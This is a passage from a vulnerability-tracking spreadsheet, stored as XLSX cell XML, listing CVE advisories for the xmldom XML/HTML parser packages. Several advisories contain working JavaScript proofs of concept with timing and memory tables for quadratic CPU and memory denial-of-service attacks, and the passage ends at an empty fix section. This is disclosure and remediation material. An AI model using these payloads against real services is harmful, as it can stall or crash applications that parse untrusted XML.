recoverable `error`/`warning`, not a fatal error, to avoid changing the parsed output in a patch
release. Converting this and the other not-well-formed-acceptance cases to a consistent `fatalError` —
including the broader end-tag leniency on the older versions — is deferred to the next breaking release,
tracked at [xmldom/xmldom#1074](https://github.com/xmldom/xmldom/issues/1074).</t></is></c><c r="T1621" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83611</t></is></c></row><row r="1622"><c r="A1622" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1622" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1622" s="5" t="inlineStr"><is><t>CVE-2026-83612</t></is></c><c r="D1622" s="5" t="inlineStr" /><c r="E1622" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1622" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1622" s="5" t="inlineStr" /><c r="H1622" s="5" t="n"><v>0.003</v></c><c r="I1622" s="5" t="inlineStr" /><c r="J1622" s="5" t="inlineStr" /><c r="K1622" s="5" t="inlineStr" /><c r="L1622" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M1622" s="5" t="inlineStr"><is><t>0.9.12</t></is></c><c r="N1622" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1622" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1622" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1622" s="5" t="inlineStr" /><c r="R1622" s="5" t="inlineStr" /><c r="S1622" s="5" t="inlineStr"><is><t>## Summary

In HTML mode (`text/html`), a raw-text element (`script`, `style`, `textarea`, `title`) whose closing
tag differs in case from its opening tag (e.g. `&lt;/ScRiPt&gt;` for `&lt;script&gt;`) is mishandled by the
parser, producing quadratic (O(n²)) output growth — a small crafted document parses and serializes
into output orders of magnitude larger, exhausting CPU and memory. A modest input of tens of KB can
therefore cause a denial of service in any service that parses untrusted HTML with xmldom. Only HTML
mode is affected.

## Details

The parser calls `parseHtmlSpecialContent` for each raw-text element in HTML mode, matched via
`isHTMLRawTextElement` / `isHTMLEscapableRawTextElement` (so all four types — `script`, `style`,
`textarea`, `title` — are in scope). It searches for the element's closing tag with
`source.indexOf('&lt;/' + tagName + '&gt;', elStartEnd)`, a byte-for-byte case-sensitive match. A
mixed-case closing tag never matches, so the search returns `-1`, and the following
`source.substring(elStartEnd + 1, -1)` extracts text backwards from the start of the document
instead of the element's content. The function then returns `-1` to the parse loop, which cannot
advance normally and falls back to character-by-character reprocessing. Every raw-text element
re-captures all source text preceding it, so output grows as O(n²) in the number of such elements.

### Root Cause

1. **Case-sensitive close-tag search** (`lib/sax.js:549`): `source.indexOf('&lt;/' + tagName + '&gt;',
   elStartEnd)` does not fold case, contrary to the WHATWG HTML RAWTEXT end-tag-name rule.
2. **Unguarded `-1`** (`lib/sax.js:550`): `source.substring(elStartEnd + 1, elEndStart)` runs even
   when `elEndStart === -1`, extracting text backwards from position 0.
3. **Unstable progression** (`lib/sax.js:556`): the function returns `elEndStart` (`-1`), driving
   repeated character-by-character fallback in the parse loop.

## Affected Versions

Only the `0.9.x` line is affected — the amplification was introduced in `0.9.0-beta.1` when
`parseHtmlSpecialContent` was refactored, and remains through `0.9.11`. The `0.8.x` line is **not**
affected: its older `parseHtmlSpecialContent` does not amplify, despite sharing the same
case-sensitive `indexOf`.

## Proof of Concept

```js
const { DOMParser, XMLSerializer } = require('@xmldom/xmldom');

const n = 1000;
const payload = '&lt;html&gt;&lt;body&gt;' + '&lt;script&gt;x&lt;/ScRiPt&gt;'.repeat(n) + '&lt;/body&gt;&lt;/html&gt;';
const doc = new DOMParser().parseFromString(payload, 'text/html');
const out = new XMLSerializer().serializeToString(doc);
console.log(payload.length, out.length, (out.length / payload.length).toFixed(1) + 'x');
// 18026 9037063 501.3x  — an 18 KB input yields ~9 MB of output
```

Output size grows quadratically with the number of case-mismatched raw-text elements:

```
Repeats | Input len | Output len | Ratio
1       | 44        | 109        | 2.5x
100     | 1826      | 93763      | 51.3x
500     | 9026      | 2268563    | 251.3x
1000    | 18026     | 9037063    | 501.3x
2000    | 36026     | 36074063   | 1001.3x
```

Proof of Concept from @KarimTantawey (tested with `script`); the same amplification occurs for `style`,
`textarea`, and `title`.

## Impact

Small attacker payloads can force disproportionate CPU and memory usage in services that
parse and serialize untrusted HTML via xmldom. The quadratic growth means a modest-sized input
(tens of kilobytes) can produce output in the tens or hundreds of megabytes, potentially
exhausting memory or causing timeouts.

The attack only requires HTML mode (`text/html` MIME type) and mixed-case closing tags for
any of the four raw-text element types. No special configuration or error handler setup is needed.

## Severity note

The CVSS 4.0 vector scores availability only (`VA:H`, with `VC:N/VI:N`): the flaw neither discloses
nor corrupts data, but a small untrusted HTML input (tens of KB) can force output and memory in the
tens to hundreds of MB, enough to exhaust a service's heap or stall its event loop. It is reachable
with no authentication, configuration, or error-handler setup — only that the application parses
untrusted `text/html` and serializes the result.

## Fix Applied

The raw-text closing tag is now matched case-insensitively in HTML raw-text mode (per the WHATWG HTML
[RAWTEXT end-tag rule](https://html.spec.whatwg.org/multipage/parsing.html#rawtext-end-tag-name-state)),
and a missing closing tag is handled explicitly, removing the quadratic output amplification. Output
for well-formed input is unchanged. Non-breaking; 0.9.x-only.</t></is></c><c r="T1622" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83612</t></is></c></row><row r="1623"><c r="A1623" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1623" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1623" s="5" t="inlineStr"><is><t>CVE-2026-83613</t></is></c><c r="D1623" s="5" t="inlineStr" /><c r="E1623" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1623" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1623" s="5" t="inlineStr" /><c r="H1623" s="5" t="n"><v>0.003</v></c><c r="I1623" s="5" t="inlineStr" /><c r="J1623" s="5" t="inlineStr" /><c r="K1623" s="5" t="inlineStr" /><c r="L1623" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M1623" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N1623" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1623" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1623" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1623" s="5" t="inlineStr" /><c r="R1623" s="5" t="inlineStr" /><c r="S1623" s="5" t="inlineStr"><is><t>## Summary

xmldom builds the attribute collection of every parsed element by inserting attributes one at a
time into a DOM `NamedNodeMap`. Each insertion first performs a **linear scan of all
already-inserted attributes** to enforce the DOM uniqueness rule (no two attributes with the same
qualified name / namespace+local-name). Parsing an element that carries `M` distinct attributes
therefore costs `1 + 2 + … + M = O(M²)` comparisons.

Because the trigger is simply "one element with many attributes", the attack payload is a
**fully well-formed XML document**. No malformed markup, no error recovery, and no non-default
parser options are involved — parsing completes silently with zero `warning`/`error`/`fatalError`
events. An attacker who can submit a modest, highly compressible document (a single element with
tens of thousands of attributes, ~340 KB uncompressed) can consume seconds of single-threaded CPU
per request, enabling an unauthenticated denial of service.

This is distinct from the known quadratic-**memory** namespace-map issue: it burns **CPU** and it
does not require any namespace declarations or nesting.

## Details

The DOM content handler adds each attribute of a starting element by calling
`el.setAttributeNode(attr)` in a loop:

```js
// DOMHandler.startElement
for (var i = 0; i &lt; len; i++) {
	var namespaceURI = attrs.getURI(i);
	var value = attrs.getValue(i);
	var qName = attrs.getQName(i);
	var attr = doc.createAttributeNS(namespaceURI, qName);
	attr.value = attr.nodeValue = value;
	el.setAttributeNode(attr);          // O(existing attrs) each — see below
}
```

https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom-parser.js#L370-L387

`setAttributeNode` delegates to `NamedNodeMap.setNamedItem`, which calls `getNamedItemNS` to look
for an existing attribute with the same namespace URI and local name before appending:

```js
setNamedItem: function (attr) {
	var el = attr.ownerElement;
	if (el &amp;&amp; el !== this._ownerElement) {
		throw new DOMException(DOMException.INUSE_ATTRIBUTE_ERR);
	}
	var oldAttr = this.getNamedItemNS(attr.namespaceURI, attr.localName);  // linear scan
	if (oldAttr === attr) {
		return attr;
	}
	_addNamedNode(this._ownerElement, this, attr, oldAttr);
	return oldAttr;
},
```

https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L612-L623

`getNamedItemNS` walks the whole list on every call:

```js
getNamedItemNS: function (namespaceURI, localName) {
	if (!namespaceURI) {
		namespaceURI = null;
	}
	var i = 0;
	while (i &lt; this.length) {
		var node = this[i];
		if (node.localName === localName &amp;&amp; node.namespaceURI === namespaceURI) {
			return node;
		}
		i++;
	}
	return null;
},
```

https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L702-L715

For the i-th attribute the scan visits `i-1` entries, so inserting `M` distinct attributes performs
`Θ(M²)` comparisons. There is no hash index or set keyed by name; the map is a plain
array-backed structure.

The same structure exists on 0.8.x. There `setNamedItem` dedups via
`getNamedItem(attr.nodeName)` instead of `getNamedItemNS`, but that method is likewise a full linear
scan, so the complexity is identical:

- `startElement` loop / `setAttributeNode`:
  https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom-parser.js#L159-L176
- `setNamedItem` → linear `getNamedItem`:
  https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L286-L308

The linear-scan `NamedNodeMap` predates the `@xmldom/xmldom` fork and is present unchanged in the
unscoped `xmldom` package back to its earliest published release. In `xmldom@0.1.0`, parsing already
inserts each attribute one at a time (`DOMHandler.startElement` loops calling
`setAttributeNS` → `setAttributeNode` → `NamedNodeMap.setNamedItem`), and `setNamedItem` dedups by
calling `getNamedItemNS`, which is a full linear `while (i--)` scan of the already-inserted
attributes — the identical `O(M²)` structure. The whole unscoped line (`0.1.0` … `0.6.0`) is
therefore affected; the earliest published tag (`0.1.0`) was verified to contain the per-insert
linear dedup scan.

## Proof of Concept

A single well-formed element with `M` distinct attributes. No malformed markup and no options:

```js
'use strict';
var DOMParser = require('@xmldom/xmldom').DOMParser;

function buildDoc(m) {
	var parts = new Array(m);
	for (var i = 0; i &lt; m; i++) parts[i] = 'a' + i + '="x"';
	return '&lt;r ' + parts.join(' ') + '/&gt;';   // &lt;r a0="x" a1="x" ... a{M-1}="x"/&gt;
}

for (var _i = 0, sizes = [2000, 4000, 8000, 16000, 32000]; _i &lt; sizes.length; _i++) {
	var m = sizes[_i];
	var xml = buildDoc(m);
	var t0 = process.hrtime.bigint();
	var doc = new DOMParser().parseFromString(xml, 'text/xml');  // silent: no error events
	var ms = Number(process.hrtime.bigint() - t0) / 1e6;
	console.log(m + ' attrs, ' + xml.length + ' bytes -&gt; ' + ms.toFixed(1) + ' ms; parsed=' +
		doc.documentElement.attributes.length);
}
```

Measured with Node.js v18.20.8 (wall-clock; absolute numbers vary by host, the **scaling** is the
load-bearing fact):

**`@xmldom/xmldom` 0.9.10:**

| M (attributes) | input bytes | time (ms) | ratio vs prev |
|---:|---:|---:|---:|
| 2000  | 18,894  | 13.4   | —     |
| 4000  | 38,894  | 38.7   | ×2.9  |
| 8000  | 78,894  | 100.8  | ×2.6  |
| 16000 | 164,894 | 406.2  | ×4.0  |
| 32000 | 340,894 | 2149.5 | ×5.3  |

**`@xmldom/xmldom` 0.8.13:**

| M (attributes) | input bytes | time (ms) |
|---:|---:|---:|
| 2000  | 18,894  | 10.6   |
| 4000  | 38,894  | 19.9   |
| 8000  | 78,894  | 75.9   |
| 16000 | 164,894 | 657.7  |
| 32000 | 340,894 | 1643.2 |

**`xmldom` (unscoped) 0.6.0:** 4000 → 28.2 ms, 8000 → 131.8 ms, 16000 → 545.2 ms (≈ ×4 per doubling).

Time grows ≈ ×4 per doubling of `M` — quadratic. About **340 KB of well-formed input costs ~1.6–2.1 s
of single-threaded CPU**, and it keeps scaling: doubling the attribute count quadruples the cost.
The document is trivially generated and compresses to a few kilobytes on the wire.

## Impact

Unauthenticated, remotely triggerable denial of service against any service that parses
attacker-influenced XML/HTML with xmldom. A single request holds one event-loop thread for seconds;
a handful of concurrent requests can saturate CPU and stall the process. Because the payload is a
plain well-formed document (one element, many attributes), it passes any "must be well-formed" gate
and reaches the parser before any application-level validation (e.g. schema checks or signature
verification) can run. The payload is highly compressible, so it is effective over compressed
transports.

## Fix Applied

Replaced the per-insert linear duplicate scan on the parse-time dedup path with a name-keyed
index, so de-duplicating an element's attributes during parse is O(M) instead of O(M²) — a
well-formed-but-hostile attribute list can no longer wedge the parse. Behavior-preserving: attribute
order and duplicate resolution (last value wins, first position kept) are byte-identical. Non-breaking
and independent of `requireWellFormed`; ships on both maintained versions.</t></is></c><c r="T1623" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83613</t></is></c></row><row r="1624"><c r="A1624" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1624" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1624" s="5" t="inlineStr"><is><t>CVE-2026-83614</t></is></c><c r="D1624" s="5" t="inlineStr" /><c r="E1624" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1624" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1624" s="5" t="inlineStr" /><c r="H1624" s="5" t="n"><v>0.004</v></c><c r="I1624" s="5" t="inlineStr" /><c r="J1624" s="5" t="inlineStr" /><c r="K1624" s="5" t="inlineStr" /><c r="L1624" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M1624" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N1624" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1624" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1624" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1624" s="5" t="inlineStr" /><c r="R1624" s="5" t="inlineStr" /><c r="S1624" s="5" t="inlineStr"><is><t>## Summary

`xmldom`'s malformed-input **error-recovery path** has two quadratic-time (O(n²)) behaviors that a
single crafted input triggers together, so a tiny, highly compressible document (tens of KB) stalls
the Node.js event loop for multiple seconds. It is reachable from `DOMParser.parseFromString` under
**default options** — i.e. from unauthenticated, network-delivered XML — making this an unauthenticated
denial of service. One of the two behaviors, the `normalize()` adjacent-text merge, is **additionally
reachable programmatically** — via a plain `normalize()` call on a DOM built with adjacent text nodes,
independent of the parser — so its fix must live in `normalize()`, not only in a parser bound.

## Details

### Finding A — `parseElementStartPart` quadratic re-scan

A `&lt;` character is not a delimiter in any tag-parsing state, so `parseElementStartPart` scans
forward character-by-character over any embedded `&lt;` until it reaches the next `&gt;` (or end of
input), then validates the accumulated slice as a tag name and throws `invalid tagName:` on failure.
The main loop catches this, reports an `error`, sets `end = -1`, and recovers by advancing a single
character (`appendText(Math.max(tagStart, start) + 1)`). With a long run of `&lt;` and a distant `&gt;`,
each of the O(n) recovery retries performs an O(n) scan plus an O(n) anchored regex validation over
the growing candidate ⇒ **O(n²)**.

Code (0.9.x, `bb7a085dc5ba1eea3212388509b97bb4b4af32b9`):

- `parseElementStartPart` character scan — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L263-L461
- tag-name validation (`setTagName` → throws `invalid tagName`) — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L886-L891
- main-loop `catch` → `error` + `end = -1` — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L234-L242
- single-character recovery fallback — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L247

Code (0.8.x, `e5c14802592685bb872c042c54c3f73758875c85`):

- `parseElementStartPart` — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/sax.js#L227
- `catch` → `error` + `end = -1` — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/sax.js#L202-L208
- recovery fallback — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/sax.js#L213
- `setTagName` validation — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/sax.js#L616-L621

### Finding B — `normalize()` adjacent-text O(K²) merge

`endDocument()` calls `document.normalize()`. For a parent with K adjacent text nodes (produced by
the one-character recovery of Finding A), `normalize()` performs K−1 merges. Each merge does a
`removeChild` — which re-indexes **all** child nodes of the parent (O(K)) — and an `appendData` —
which rebuilds the accumulator string `this.data + text` (O(K)). Total: **O(K²)**.

Well-formed XML cannot produce adjacent text-node siblings *through the parser* (each text run is one
node; comments, CDATA, PIs, and elements sit between runs), so the **parse-path** trigger for Finding B
is the malformed-input recovery that emits single-character text nodes. The same O(K²) merge is,
however, independently reachable via the public `normalize()` API on a programmatically built tree
(see "Finding B is additionally reachable programmatically" below).

Code (0.9.x, `bb7a085dc5ba1eea3212388509b97bb4b4af32b9`):

- `endDocument` → `normalize()` — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom-parser.js#L418-L420
- `normalize()` adjacent-text merge — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L1336-L1356
- `removeChild` re-index-all branch — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L1788-L1798
- `appendData` string rebuild — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L2786-L2790

Code (0.8.x, `e5c14802592685bb872c042c54c3f73758875c85`):

- `endDocument` → `normalize()` — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom-parser.js#L213-L214
- `normalize()` merge — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L529-L549
- `removeChild` re-index-all branch — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L756-L773
- `appendData` string rebuild — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L1533

### Finding B is additionally reachable programmatically (no parser involved)

`Node.prototype.normalize()` is public API on every `Document`/`Element`. A tree built entirely through
the ordinary DOM API — `new DOMImplementation().createDocument(...)`, then K× `createTextNode` +
`appendChild` on one parent — reaches the **same** O(K²) merge when the application calls `normalize()`,
with **no** parsing and **no** error-recovery. The parser is only *one* of the two callers of the
vulnerable merge:

- the parser's automatic `endDocument()` → `document.normalize()` (the parse-path trigger above), and
- any explicit application call to the public `normalize()` on a tree with adjacent text nodes.

`XMLSerializer` does **not** call `normalize()`, so serializing an un-merged tree is O(total text), not
O(K²); the O(K²) surface is exactly those two `normalize()` callers. Consequently a parser-side bound
alone cannot remediate Finding B — the fix must live in `normalize()`.

## Affected Versions

Both findings are present across the full published `@xmldom/xmldom` history — both
currently-maintained versions (`0.8.x` and `0.9.x`) are affected — and across the retired unscoped
`xmldom` line. Finding B's `normalize()` merge is additionally reachable **programmatically**: a
direct `normalize()` call on a DOM built with adjacent text nodes hits the same O(K²) merge,
independent of the parser — so, unlike Finding A, it does not require the malformed-input recovery
path.

## Proof of Concept

Default `DOMParser`, no options. The input is trivially compressible (`a&lt;` / `a&lt;&gt;` repeated) and
never throws — it is parsed via the recovery path.

```js
const { DOMParser } = require('@xmldom/xmldom');

// Silence the expected `error`-level recovery reports (default handler logs
// them to console.error without throwing; only fatalError throws).
console.error = function () {};

function timeParse(label, xml, mime) {
  const t0 = process.hrtime.bigint();
  new DOMParser().parseFromString(xml, mime); // completes; no exception
  const ms = Number(process.hrtime.bigint() - t0) / 1e6;
  console.log(label + '  bytes=' + Buffer.byteLength(xml) + '  time=' + ms.toFixed(1) + ' ms');
}

for (const N of [4000, 8000, 16000, 32000]) {
  // Finding A: long re-scans, O(n^2) during parse.
  timeParse('A N=' + N, '&lt;r&gt;' + 'a&lt;'.repeat(N) + '&lt;/r&gt;', 'text/xml');
  // Finding B: short re-scans (cheap parse) but K adjacent text nodes -&gt; O(K^2) in normalize().
  timeParse('B N=' + N, '&lt;r&gt;' + 'a&lt;&gt;'.repeat(N) + '&lt;/r&gt;', 'text/html');
  // Combined: ONE input hits both A and B under the default parser.
  timeParse('C N=' + N, '&lt;r&gt;' + 'a&lt;'.repeat(N) + '&lt;/r&gt;', 'text/xml');
}
```

Measured on Node v18.20.8 (absolute ms vary by host; the load-bearing fact is that doubling the
input ~quadruples the time — canonical O(n²)):

Finding A, isolated (`"&lt;r&gt;" + "a&lt;"×N + "&lt;/r&gt;"`, normalize disabled to isolate the re-scan):

| N | input bytes | `@xmldom/xmldom` 0.9.10 | 0.8.13 |
|--:|--:|--:|--:|
| 2000 | 4007 | 43 ms | 37 ms |
| 4000 | 8007 | 129 ms | 106 ms |
| 8000 | 16007 | 434 ms | 424 ms |
| 16000 | 32007 | 1629 ms | 1611 ms |

Finding B, isolated (`"&lt;r&gt;" + "a&lt;&gt;"×N + "&lt;/r&gt;"`, time attributable to `normalize()`):

| K (N) | input bytes | 0.9.10 | 0.8.13 |
|--:|--:|--:|--:|
| 4000 | 12007 | 120 ms | 165 ms |
| 8000 | 24007 | 589 ms | 771 ms |
| 16000 | 48007 | 3142 ms | 4448 ms |
| 32000 | 96007 | 12127 ms | 12951 ms |

Combined (default parser, both findings; `"&lt;r&gt;" + "a&lt;"×N + "&lt;/r&gt;"`):

| N | input bytes | 0.9.10 | 0.8.13 |
|--:|--:|--:|--:|
| 4000 | 8007 | 341 ms | 397 ms |
| 8000 | 16007 | 1894 ms | 1641 ms |
| 16000 | 32007 | 4398 ms | 7661 ms |

~32 KB of input → several seconds of single-threaded event-loop stall.

### Finding B via the public `normalize()` API (no parser)

```js
const { DOMImplementation } = require('@xmldom/xmldom');

function timeNormalize(K) {
  const doc = new DOMImplementation().createDocument(null, 'r', null);
  const el = doc.documentElement;
  for (let i = 0; i &lt; K; i++) el.appendChild(doc.createTextNode('x')); // K adjacent text nodes
  const t0 = process.hrtime.bigint();
  doc.normalize();                                    // O(K^2) merge — no parsing involved
  const ms = Number(process.hrtime.bigint() - t0) / 1e6;
  console.log('K=' + K + '  time=' + ms.toFixed(1) + ' ms');
}
for (const K of [2000, 4000, 8000, 16000, 32000]) timeNormalize(K);
```

Measured on Node v18.20.8 (doubling K ~quadruples the time — O(K²)):

| K | 0.9.10 | 0.8.13 |
|--:|--:|--:|
| 2000 | 5.7 ms | 5.6 ms |
| 32000 | 1263 ms | 1704 ms |

This path is reachable by any application that builds a DOM from attacker-influenced data and calls
`normalize()`, entirely independent of `DOMParser`.

## Impact

Availability only: a single parse of a small crafted document blocks the Node.js event loop for the
duration of the quadratic work (multiple seconds at tens of KB; larger inputs scale as O(n²)). No
memory blow-up beyond transient strings, no data exposure, no integrity impact. Because XML is
routinely accepted from untrusted sources and parsed with default options, one request can stall a
server. The payloads are highly compressible, so any endpoint accepting compressed XML faces
additional amplification. Finding B is additionally reachable via an explicit `normalize()` call on a
programmatically built DOM (see Proof of Concept), so applications that construct a document from attacker-influenced
data and normalize it are exposed even without parsing.

## Severity note

The complexity is **quadratic**, not exponential, so a multi-second stall requires
tens-to-hundreds of KB of input. `VA:H` reflects that xmldom applies **no** input-size limit and the
path runs on default-options parsing, so a single unbounded parse can fully stall the event loop.

## Fix Applied

Two independent, non-breaking fixes shipped together — each alone leaves the other's quadratic cost dominating the default parse.
Finding A — terminate the malformed tag-name scan at an embedded `&lt;`, so error recovery is linear instead of O(n²). DOM output is unchanged; only the reported error-message text differs (error strings are not a semver contract).
Finding B — merge adjacent text nodes in `normalize()` in O(K) instead of O(K²), which also closes the same slowdown reachable programmatically through a direct `normalize()` call. Both ship on both maintained versions.</t></is></c><c r="T1624" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83614</t></is></c></row><row r="1625"><c r="A1625" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1625" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1625" s="5" t="inlineStr"><is><t>CVE-2026-83615</t></is></c><c r="D1625" s="5" t="inlineStr" /><c r="E1625" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1625" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1625" s="5" t="inlineStr" /><c r="H1625" s="5" t="n"><v>0.004</v></c><c r="I1625" s="5" t="inlineStr" /><c r="J1625" s="5" t="inlineStr" /><c r="K1625" s="5" t="inlineStr" /><c r="L1625" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M1625" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N1625" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1625" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1625" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1625" s="5" t="inlineStr" /><c r="R1625" s="5" t="inlineStr" /><c r="S1625" s="5" t="inlineStr"><is><t>## Summary

When an element declares a namespace prefix, xmldom copies the entire in-scope namespace map
into a fresh object and keeps that copy on the element while it is open on the parse stack. A
crafted document that nests N elements, each declaring one unique prefix, therefore drives the
parser to hold on the order of N(N+1)/2 = **O(N²) namespace-map entries at its peak**, so a small,
highly compressible input exhausts the heap. Parsing runs under default options on untrusted,
network-delivered XML, so a sub-megabyte payload can OOM-crash the process before any
application-level validation runs — an unauthenticated denial of service.

## Details

`appendElement` performs the copy: `_copy` clones the current namespace map into a fresh object for
each prefix-declaring element, and the copy is retained on that element's parse-stack entry:

```js
if (localNSMap == null) {
    localNSMap = Object.create(null);
    _copy(currentNSMap, (currentNSMap = Object.create(null)));   // full copy of all ancestor prefixes
}
currentNSMap[nsPrefix] = localNSMap[nsPrefix] = value;
...
el.currentNSMap = currentNSMap;   // retained while the element is open on the parse stack
```

https://github.com/xmldom/xmldom/blob/08a22d78e4bc50f12ce9f5090b8d96ee6031ac7b/lib/sax.js#L467-L540

The copies stack: the element at depth `i` copies a map of size ~`i`, and every ancestor stays live
on the parse stack until it closes, so at the deepest point Σ`i` namespace entries are held at once.
That peak is transient — the completed DOM retains only O(N), one small namespace map per node — but
it is reached during parsing, which is what OOM-crashes the process.

## Proof of Concept

A minimal document — N nested elements, each declaring one unique namespace prefix (no SAML wrapper
needed):

```js
const { DOMParser } = require('@xmldom/xmldom');

function build(n) {
  let open = '', close = '';
  for (let i = 0; i &lt; n; i++) { open += `&lt;a xmlns:p${i}="urn:${i}"&gt;`; close = '&lt;/a&gt;' + close; }
  return `&lt;r&gt;${open}${close}&lt;/r&gt;`;   // &lt;r&gt;&lt;a xmlns:p0="urn:0"&gt;...&lt;a xmlns:p{n-1}="urn:{n-1}"&gt;...&lt;/a&gt;...&lt;/r&gt;
}

for (const n of [2000, 4000, 8000, 16000]) {
  const src = build(n);
  new DOMParser().parseFromString(src, 'text/xml');   // peak memory ~ O(n^2)
  console.log(n, (src.length / 1024).toFixed(0) + ' KB in', (process.resourceUsage().maxRSS / 1024).toFixed(0) + ' MB peak RSS');
}
```

Measured on Node.js v24 (peak RSS ~quadruples per doubling of depth; absolute numbers vary by host):

| depth  | input   | peak RSS                        |
| -----: | ------: | ------------------------------- |
|  2,000 |  56 KB  | 266 MB                          |
|  4,000 | 115 KB  | 622 MB                          |
|  8,000 | 232 KB  | 1.9 GB                          |
| 16,000 | ~470 KB | OOM crash (default ~4 GB heap)  |

About 470 KB of trivially-generated, highly-compressible input crashes a default Node.js process;
larger depths scale as O(N²) into the tens of GB, crashing larger hosts (as first measured by the
reporter with a SAML-shaped payload).

## Impact

Unauthenticated denial of service against any service that parses attacker-influenced XML with
xmldom under default options. A single sub-megabyte request drives multi-gigabyte peak memory and
can OOM-crash the process before any application-level validation (e.g. schema checks or a SAML
signature verification) runs. The payload is a plain namespace-nesting document and highly
compressible, so it is effective over compressed transports (e.g. an HTTP-Redirect / DEFLATE
binding, not only POST bindings).

## Severity note

The CVSS 4.0 vector scores availability only (`VC:N/VI:N/VA:H`): the flaw neither discloses nor
alters data, it exhausts the heap. `VA:H` is justified because a single unauthenticated,
network-delivered request (`AV:N/PR:N/UI:N`) of trivial complexity (`AC:L/AT:N`) drives the parser
to multi-gigabyte peak memory and OOM-crashes the process before any application-level logic runs —
a full loss of availability for the affected service.

## Fix Applied

